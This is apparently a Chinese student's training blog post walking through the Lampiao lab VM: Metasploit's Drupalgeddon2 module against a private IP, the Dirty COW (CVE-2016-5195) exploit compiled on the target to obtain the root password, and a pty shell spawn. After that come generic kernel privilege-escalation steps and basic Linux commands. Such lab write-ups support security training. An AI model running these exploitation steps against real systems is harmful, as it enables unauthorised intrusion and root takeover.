毕业实训-Day10

于 2024-09-09 09:07:52 发布
阅读量811 收藏 16
点赞数 12
文章标签: 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kazmiller0/article/details/142040905
版权

一、Lampiao提权案例

1. 端口扫描

使用nmap进行网段扫描

用nmap对可疑IP进行全端口深度扫描

2. 信息收集

发现开启了1898端口,用浏览器访问这个端口

3. MSF连接

使用命令启动msf

搜索框架并使用该模块

search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2

用show options查看需要配置的参数

设置参数并启动

set rhosts 192.168.150.129
set rport 1898
run

进入命令行收集目标主机信息

uname -a
cat /proc/version
cat /etc/os-release

4. 配置提权工具

下载提权辅助工具linux-exploit-suggester-master,并上传到受害主机

 为该文件添加可执行权限

5. 漏洞发现

运行h.sh,看到许多受害主机可能存在的漏洞

从中可以发现存在dirtycow漏洞

6. 漏洞利用

通过使用浏览器查询CVE-2016-5195

找到CVE-2016-5195并访问,从中有对应EXP网站指引,下载EXP并上传至kali

上传文件到受害主机的tmp目录并命名为herry.cpp

upload CVE-2016-5195/dcow.cpp /tmp/henry.cpp
shell
cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o henry henry.cpp -lutil

启动shell,间接在受害主机上对cpp文件进行编译

shell
cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o henry henry.cpp -lutil

启动该程序,可以看到受害主机的登录密码

7. 权限提升

尝试使用su root获取管理员权限,提示缺少终端,使用python下载后重试,并输入刚才跑出来的密码以登录

python -c 'import pty; pty.spawn("/bin/bash")'

二、Linux内核提权利用步骤

1. 信息收集

  • 系统版本:检查内核版本(使用 uname -r)和发行版信息(如 lsb_release -a)。了解系统的版本对于寻找已知漏洞非常重要。
  • 硬件信息:查看系统硬件配置(如 lscpulshw),一些特定的硬件配置可能与某些内核漏洞相关。
  • 已安装的软件:列出所有已安装的软件和服务(如 dpkg -lrpm -qa),以识别可能的漏洞或不安全的配置。

2. 漏洞扫描

  • 内核漏洞:搜索与当前内核版本相关的已知漏洞(可以使用漏洞数据库如 CVE、Exploit-DB 等)。
  • 检查补丁:验证系统是否应用了所有的安全补丁(可以使用 yum, apt, zypper 等工具来检查更新)。

3. 利用漏洞

  • 选择利用方式:根据找到的漏洞,选择合适的利用方式。常见的利用方式包括内核模块漏洞、特权程序漏洞、配置错误等。
  • 编写或下载利用代码:如果漏洞公开且有现成的利用代码,可以下载并使用;如果没有,可能需要自己编写利用代码。
  • 执行利用代码:以普通用户权限执行利用代码,如果漏洞存在,可能会提升到 root 权限。

4. 验证提权

  • 检查权限:通过执行 idwhoami 等命令,确认是否获得了更高的权限。
  • 系统检查:确认提权是否成功后,检查系统的其他安全措施是否被绕过或破坏。

三、Linux常用命令

1.ls

列出目录中的文件和文件夹。常用选项包括 -l(长格式显示),-a(显示隐藏文件),-h(以人类可读的格式显示文件大小)。

ls -lah

2.cd

改变当前工作目录。

cd /path/to/directory

3.pwd

显示当前工作目录的完整路径。

pwd

4.cp

复制文件或目录。常用选项包括 -r(递归复制目录),-i(覆盖前提示)。

cp source_file destination_file cp -r source_directory destination_directory

5.mv

移动或重命名文件和目录。

mv old_name new_name mv file /path/to/destination

6.rm

删除文件或目录。常用选项包括 -r(递归删除目录),-f(强制删除)。

rm file rm -r directory

7.touch

创建空文件或更新文件的时间戳。

touch file_name

8.chmod

改变文件或目录的权限。

chmod 755 file

9.chown

改变文件或目录的拥有者和组。

chown user:group file

10.man

查看命令的手册页(帮助文档)。

man command_name

kazmiller0
关注
计算机专业实习实训内容和要求,大学生计算机实习目的和要求.doc
weixin_39578457的博客
06-21 2488
大学生计算机实习目的和要求大学生计算机实习目的和要求1、学生在学习了专业课程之后,通过专业实习,在了解企业概况的基础上,对与计算机应用密切相关的某一方面的管理业务活动进行详细调查和系统分析,建立业务管理信息系统的整体概念,学会运用专业知识去发现问题和解决问题的方法,增强业务实践能力。2、通过实习,参加一定的业务活动和管理实践,了解企业的管理现状、所具备的基础及存在的问题,了解国情,增强学好专业的信...
粤嵌实习智能家居day3--基于6818开发板
weixin_65366793的博客
07-12 2265
在开发板上显示一张bmp图片
linux中的apt命令
路过人间,一叶知秋
08-04 7267
apt是Advanced Package Tool的简写,是工作于Debian, Ubuntu等相关linux发行版上的软件包管理系统。apt在类Unix操作系统上提供如自动检索、配置和安装软件包等功能来简化软件的管理。 `apt`整合了`apt-get`和`apt-cache`——这两个命令功能很多但一般往往用不到,因此apt保留了常用和重要的功能。
如何在 Linux 中使用 apt 命令管理包
网络技术联盟站
12-18 3863
本文通过示例向您展示如何在 Ubuntu、Debain、Linux Mint 或任何其他基于 Debian 或 Ubuntu 的发行版中使用 apt 命令,以便您可以轻松管理软件包。 apt是一款功能强大的包管理工具,可用于在Linux 操作系统中搜索、安装、更新、升级和管理包,它会自动管理软件包依赖项,根据需要安装所需的软件,并在不再需要时将其删除。 Linux 中的 apt 命令是什么? apt(高级打包工具)是一个命令行工具,用于与Debian和基于 Debian 的 Linux 发行版(如Ubunt
apt搜索某个软件及版本
柳鲲鹏
12-11 3738
自己也不知道,怎么办?如下: apt-cache search openjdk
毕业设计——基于监督学习的web入侵检测系统(0day收集器).zip
02-14
可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,...
基于HTML实现聊天留言网站_舒明工作室留言本_day18book(HTML源码+数据集+项目使用说明+毕业设计).rar
06-26
可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现...
Linux基础-apt命令
最新发布
洪源兄
05-20 2772
这里记录一下我常用的apt命令。apt 是Linux下很强大的命令行软件包管理器, apt 提供软件包搜索,管理和信息查询等功能。它提供的功能与其他 APT 工具相同(像 apt-get 和 apt-cache),也也是说能用 apt-get 的场景其实用 apt 也能用。两者可以互换。
运维备忘录』之 APT 命令详解
流浪字节的博客
02-18 2008
APT(Advanced Packaging Tools)是Debian及其派生的Linux软件包管理器。APT可以自动下载,配置,安装二进制或者源代码格式的软件包,因此简化了Unix系统上管理软件的过程。APT最早被设计成dpkg的前端,用来处理deb格式的软件包。现在经过APT-RPM组织修改,APT已经可以安装在支持RPM的系统管理RPM包。它与 YUM 很相似,就像孪生兄弟。
Ubuntu - 软件包管理
学无止境
10-23 244
aptapt
apt的常用命令
yuer011的博客
11-29 455
apt-get -f install android-tools-fastboot强制安装包。apt-cache search android-tools-adb查看时候有指定的安装源。
Ubuntu的apt命令解释
朝着未来勇敢前进
10-28 738
apt-get update——在修改/etc/apt/sources.list或/etc/apt/preferences之後运行该命令。此外您需要定期运行这一命令以确保您的软件包列表是最新的。 apt-get install packagename——安装一个新软件包(参见下文的aptitude) apt-get remove packagename——卸载一个已安装的软件包(保留配置文档) a
使用apt-cache search搜索想要的软件包
热门推荐
M2嵌入式
05-15 1万+
我在编译u-boot代码的时候遇到了如下问题: LD test/dm/built-in.o CC examples/standalone/stubs.o LD examples/standalone/libstubs.o CC examples/standalone/hello_world.o LD examples/stand...
Linux apt命令详解
qq_30150579的博客
11-15 1800
Linux apt命令详解
Ubuntu笔记——apt指令
weixin_43402353的博客
10-28 1269
2020.10.28 星期三 Ubuntu笔记 apt [options] [command] [package …] options:可选,选项包括 -h(帮助),-y(当安装过程提示选择全部为"yes"),-q(不显示安装的过程)-f 修复依赖源 command:要进行的操作 package:安装的包名 apt 常用命令 列出所有可更新的软件清单命令:sudo apt update 升级软件包:sudo apt upgrade 列出可更新的软件包及版本信息:apt list --upgradeable
linux apt按包名搜索
m0_37537177的博客
01-24 3925
linux apt包名搜索: apt-cache search 内容
ubuntu怎用使用命令搜索软件源中的软件
weixin_34062329的博客
04-08 556
转自:http://jingyan.baidu.com/article/6d704a13f6bf1b28da51ca69.html   ubuntu中是用apt-get来进行软件安装的,我们首先打开终端来查看一下apt-get的常用命令 输入: sudo apt-get 可以看到很多命令,而其中好像并没有什么查找软件包的命令      这样假如不...
Java毕业设计学习资源 - Day07源代码解读
资源摘要信息:"java计算机课程毕业设计学习源代码day07.zip" 本压缩包"java计算机课程毕业设计学习源代码day07.zip"中包含了多个文件,这些文件涵盖了Java编程语言的学习资源,对于计算机课程的毕业设计有着重要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值